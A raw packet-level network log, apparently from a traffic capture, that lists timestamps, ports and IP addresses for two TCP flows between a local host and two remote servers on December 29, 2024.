Dec 29, 2024 11:18:22.885060072 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.893661022 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.893775940 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.893827915 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.901555061 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.901685953 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.901741028 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.909982920 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.910080910 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.910129070 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.918308020 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.918415070 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.918467999 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.926743984 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.926877975 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.926920891 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.935131073 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.935195923 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.935235977 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.943376064 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.943466902 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.943511963 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:22.951685905 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.951769114 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:22.951824903 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.020441055 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.020467043 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.020559072 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.020591974 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.020611048 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.020632982 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.026881933 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.026897907 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.026971102 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.026998043 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.027014971 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.027036905 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.035084009 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.035105944 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.035150051 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.035176039 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.035192013 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.035216093 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.043159962 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.043181896 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.043219090 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.043243885 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.043257952 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.043281078 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.051423073 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.051441908 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.051500082 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.051522970 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.051537037 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.051557064 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.059047937 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.059063911 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.059124947 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.059150934 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.059187889 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.066196918 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.066214085 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.066253901 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.066279888 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.066293955 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.066314936 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.074338913 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.074356079 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.074404955 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.074430943 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.074445009 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.074469090 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.083657026 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.083782911 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.083837032 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.086415052 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.086534977 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.086582899 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.091866970 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.091976881 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.092020988 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.097363949 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.097461939 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.097522974 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.102719069 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.102838993 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.102885008 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.108222008 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.108292103 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.108338118 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.113606930 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.113718987 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.113764048 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.119081974 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.119232893 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.119271994 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.124524117 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.124599934 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.124646902 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.129934072 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.130130053 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.130179882 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.135411024 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.135483027 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.135560036 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.140789986 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.140887022 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.140933990 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.146251917 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.146327019 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.146369934 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.151684999 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.151784897 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.151834011 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.157111883 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.157211065 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.157255888 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.162517071 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.214160919 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.221698999 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.221724033 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.221795082 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.221815109 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.221831083 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.221858025 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.229073048 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.229089975 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.229139090 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.229145050 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.229186058 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.229206085 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.236258030 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.236277103 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.236341000 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.236349106 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.236390114 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.244407892 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.244427919 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.244472027 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.244481087 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.244512081 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.244518995 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.252547026 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.252564907 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.252636909 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.252646923 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.252686024 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.260232925 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.260251999 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.260318995 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.260328054 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.260370016 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.268455029 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.268476963 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.268542051 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.268554926 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.268601894 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.275661945 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.275676966 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.275742054 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.275752068 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.275794983 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.295022964 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.295104027 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.295156956 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.296367884 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.296509027 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.296557903 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.300858021 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.300976038 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.301029921 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.305340052 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.305449963 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.305491924 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.309855938 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.309961081 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.310014963 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.314349890 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.314454079 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.314503908 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.318900108 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.319060087 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.319108009 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.323354959 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.323468924 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.323525906 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.327903032 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.328002930 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.328053951 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.332375050 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.332449913 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.332501888 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.336898088 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.337021112 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.337070942 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.341347933 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.341470003 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.341521025 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.345851898 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.345951080 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.346003056 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.350332975 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.350445986 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.350502968 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.354830027 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.354939938 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.355031013 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.359335899 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.359457016 CET	18852	49710	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:23.359530926 CET	49710	18852	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:23.423113108 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.423141003 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.423489094 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.423511982 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.423552990 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.430556059 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.430577040 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.430685043 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.430692911 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.430735111 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.437659025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.437678099 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.437802076 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.437812090 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.437868118 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.445990086 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.446007967 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.446131945 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.446141005 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.446187973 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.454034090 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.454072952 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.454166889 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.454179049 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.454224110 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.461626053 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.461641073 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.461723089 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.461734056 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.461774111 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.469960928 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.469976902 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.470076084 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.470083952 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.470136881 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.477000952 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.477016926 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.477102041 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.477112055 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.477150917 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.624368906 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.624397039 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.624449015 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.624486923 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.624500036 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.627841949 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.631647110 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.631664038 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.631728888 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.631742001 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.631782055 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.639756918 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.639791965 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.639836073 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.639849901 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.639878988 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.639894962 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.647948027 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.647965908 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.648026943 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.648037910 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.648087978 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.655117035 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.655133009 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.655215979 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.655229092 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.655268908 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.662815094 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.662838936 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.662909985 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.662924051 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.662962914 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.670959949 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.670975924 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.671056986 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.671066046 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.671108007 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.679085970 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.679115057 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.679182053 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.679199934 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.679240942 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.825850010 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.825880051 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.825954914 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.825999022 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.826014996 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.827830076 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.833219051 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.833235979 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.833297968 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.833306074 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.833344936 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.841398001 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.841420889 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.841492891 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.841501951 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.841552019 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.848562956 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.848579884 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.848628998 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.848635912 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.848670006 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.848685026 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.856673002 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.856688023 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.856758118 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.856770992 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.856812000 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.864428997 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.864445925 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.864520073 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.864530087 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.864554882 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.864573002 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.872525930 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.872543097 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.872602940 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.872612000 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.872651100 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.880794048 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.880820990 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.880872011 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.880887032 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:23.880909920 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:23.880925894 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.029092073 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.029115915 CET	443	49708	47.79.48.211	192.168.2.7
